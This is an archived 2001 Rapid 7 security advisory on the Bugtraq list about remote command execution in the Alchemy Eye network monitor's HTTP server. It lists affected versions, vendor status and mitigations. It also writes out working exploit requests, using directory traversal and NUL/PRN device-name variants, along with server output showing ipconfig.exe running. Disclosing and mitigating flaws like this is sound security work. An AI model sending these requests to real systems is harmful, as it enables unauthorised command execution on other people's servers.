Home page logo
/

bugtraq logo Bugtraq mailing list archives

Rapid 7 Advisory R7-0001: Alchemy Eye HTTP Remote Command Execution
From: Rapid 7 Security Advisories <advisory () rapid7 com>
Date: Thu, 29 Nov 2001 20:35:43 -0800


-----BEGIN PGP SIGNED MESSAGE-----

_______________________________________________________________________
                   Rapid 7, Inc. Security Advisory

          Visit http://www.rapid7.com to download NeXpose(tm), our
          advanced vulnerability scanner. Linux and Windows 2000
          versions are available now!
_______________________________________________________________________

Rapid 7 Advisory R7-0001: Alchemy Eye HTTP Remote Command Execution

    Published:  November 29, 2001
    Revision:   1.0
    CVE ID:     CAN-2001-0871
    Bugtraq ID: 3599

1. Affected system(s):

    KNOWN VULNERABLE:
     o Alchemy Eye and Alchemy Network Monitor v2.0 through v2.6.18
       (vulnerable to first variant, see below)
     o Alchemy Eye and Alchemy Network Monitor v2.6.19 through v3.0.10
       (vulnerable to second variant, see below)

    Apparently NOT VULNERABLE:
     o Alchemy Eye v1.7 (has no web access feature)
     o Alchemy Eye v1.8 (has no web access feature)

2. Summary

    Alchemy Eye and Alchemy Network Monitor are network management
    tools for Microsoft Windows.  The product contains a built-in HTTP
    server for remote monitoring and control.  This HTTP server allows
    arbitrary commands to be run on the server by a remote
    attacker.

    The Common Vulnerabilities and Exposures (CVE) project has assigned
    the identifier CAN-2001-0871 to this issue. This is a candidate for
    inclusion in the CVE list (http://cve.mitre.org), which standardizes
    names for security problems.

    Bugtraq has assigned the identifier 3599 to this vulnerability.
    More information on Bugtraq can be found at http://www.securityfocus.com

3. Vendor status and information

    Alchemy Eye
    Alchemy Labs, Inc.
    http://www.alchemy-lab.com/products/eye/

    Alchemy Network Monitor
    DEK Software, Inc.
    http://www.deksoftware.com/alchemy/

    Vendors notified 7/25/2001. Initial problem fixed shortly thereafter
    but subsequent releases (up to and including the current release,
    v3.0.10) are still vulnerable to a variant of the same attack.
    Vendor is aware of the problems but has stopped responding to
    our emails.

4. Solution

    The current version of the product is VULNERABLE. Future versions may
    also be vulnerable.  If you are using any of the vulnerable versions,
    we suggest the following:

       (a) Disable HTTP access completely via Preferences.  You must
       restart the product for this to take effect.

       or, (b) Require HTTP authentication via Preferences.  You must
       restart the product for this to take effect.  This is only possible
       with versions 2.6.x and later (earlier versions have no
       authentication option).

       (c) Create a very restricted user account and run the product under
       those credentials.

5. Detailed analysis

    Versions 2.x through 2.6 are vulnerable to arbitrary remote command
    execution by using a simple dotdot traversal.

          $ telnet localhost 80
          Trying 127.0.0.1...
          Connected to localhost.
          Escape character is '^]'.
          GET /cgi-bin/../../../../WINNT/system32/ipconfig.exe HTTP/1.0

          HTTP/1.0 200 OK
          Date: Thu, 29 Nov 2001 18:20:00 GMT
          Server: Alchemy Eye/2.0.20
          MIME-version: 1.0
          Content-Type: text/html
          Location: /cgi-bin/../../../../WINNT/system32/ipconfig.exe
          Content-Length: 275


          Windows 2000 IP Configuration

          Ethernet adapter Cable:

                  Connection-specific DNS Suffix  . : foo.bar.com
                  IP Address. . . . . . . . . . . . : 192.168.0.2
                  Subnet Mask . . . . . . . . . . . : 255.255.255.0
                  Default Gateway . . . . . . . . . : 192.168.0.1


    Later patched 2.6 revisions are not vulnerable to the simple dotdot
    traversal:

          $ telnet localhost 80
          Trying 127.0.0.1...
          Connected to localhost.
          Escape character is '^]'.
          GET /cgi-bin/../../../../WINNT/system32/ipconfig.exe HTTP/1.0

          HTTP/1.0 403 Forbidden
          Server: Alchemy Eye/2.6.16
          MIME-version: 1.0
          Content-Type: text/plain
          Location: /cgi-bin/../../../../WINNT/system32/ipconfig.exe
          Content-Length: 9

          Forbidden


    However, these versions are vulnerable to a variant that combines
    dotdot traversal with the special Windows device name "NUL":

          $ telnet localhost 80
          Trying 127.0.0.1...
          Connected to localhost.
          Escape character is '^]'.
          GET /cgi-bin/NUL/../../../../WINNT/system32/ipconfig.exe HTTP/1.0

          HTTP/1.0 200 OK
          Server: Alchemy Eye/2.6.16
          MIME-version: 1.0
          Content-Type: text/html
          Location: /cgi-bin/NUL/../../../../WINNT/system32/ipconfig.exe
          Content-Length: 275


          Windows 2000 IP Configuration

          Ethernet adapter Cable:

                  Connection-specific DNS Suffix  . : foo.bar.com
                  IP Address. . . . . . . . . . . . : 192.168.0.2
                  Subnet Mask . . . . . . . . . . . : 255.255.255.0
                  Default Gateway . . . . . . . . . : 192.168.0.1


    Versions 2.7.x and above address the "NUL" issue but are still vulnerable
    if you use a device name other than "NUL", e.g. "PRN":

          $ telnet localhost 80
          Trying 127.0.0.1...
          Connected to localhost.
          Escape character is '^]'.
          GET /cgi-bin/PRN/../../../../WINNT/system32/ipconfig.exe HTTP/1.0

          HTTP/1.0 200 OK
          Server: Alchemy Eye/3.0.10
          MIME-version: 1.0
          Content-Type: text/html
          Location: /cgi-bin/PRN/../../../../WINNT/system32/ipconfig.exe
          Content-Length: 275


          Windows 2000 IP Configuration

          Ethernet adapter Cable:

                  Connection-specific DNS Suffix  . : foo.bar.com
                  IP Address. . . . . . . . . . . . : 192.168.0.2
                  Subnet Mask . . . . . . . . . . . : 255.255.255.0
                  Default Gateway . . . . . . . . . : 192.168.0.1


    The attacker can not run commands with arguments because
    the HTTP server does not handle URL-encoded spaces (%20),
    nor does it handle actual spaces.

6. Contact Information

       Rapid 7 Security Advisories
       Email:   advisory () rapid7 com
       Web:     http://www.rapid7.com
       Phone:   +1 (212) 558-8700

7. Disclaimer and Copyright

    Rapid 7, Inc. is not responsible for the misuse of the information
    provided in our security advisories. These advisories are a service
    to the professional security community.  There are NO WARRANTIES
    with regard to this information. Any application or distribution of
    this information constitutes acceptance AS IS, at the user's own
    risk.  This information is subject to change without notice.

    This advisory Copyright (C) 2001 Rapid 7, Inc.  Permission is
    hereby granted to redistribute this advisory in electronic media
    only, providing that no changes are made and that the copyright
    notices and disclaimers remain intact.  This advisory may not be
    printed or distributed in non-electronic media without the
    express written permission of Rapid 7, Inc.


-----BEGIN PGP SIGNATURE-----
Version: PGP 7.0.1

iQEVAwUBPAcMn+stPa8cHEsJAQEZUQgAwPeHJLOusOnIN88hFPOX56efWkcliduK
aetWtYbPLzNKhgSxJeWEddTzZeT3i/ulwT810jQyS4nfxGlZa2JvaXMXeAwxKLXm
IMXAymCbXKdP4D/SYe5/kLUeWcnujgyYz0m3Y2qmcGDjhaizm8iWxvYUPunX6/ra
6fXTjQjjqRnB75sTx4FZYglvE4o0FFNNQmEvbPJXmF0No7X/KFaDAM4DD/R/H1IL
C6aAed9NppY2KizzO7pf3Rd3M1kJax3xC6+8hQWYplHJZN3WQ+msNlpq/2O6D5Gg
dzIi8ANkGzzrw1y4ZbYPTFvmyVE6sQTW5ShH5t69bl6iGieVtS9JIQ==
=keCq
-----END PGP SIGNATURE-----


  By Date           By Thread  

Current thread:
  • Rapid 7 Advisory R7-0001: Alchemy Eye HTTP Remote Command Execution Rapid 7 Security Advisories (Nov 30)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]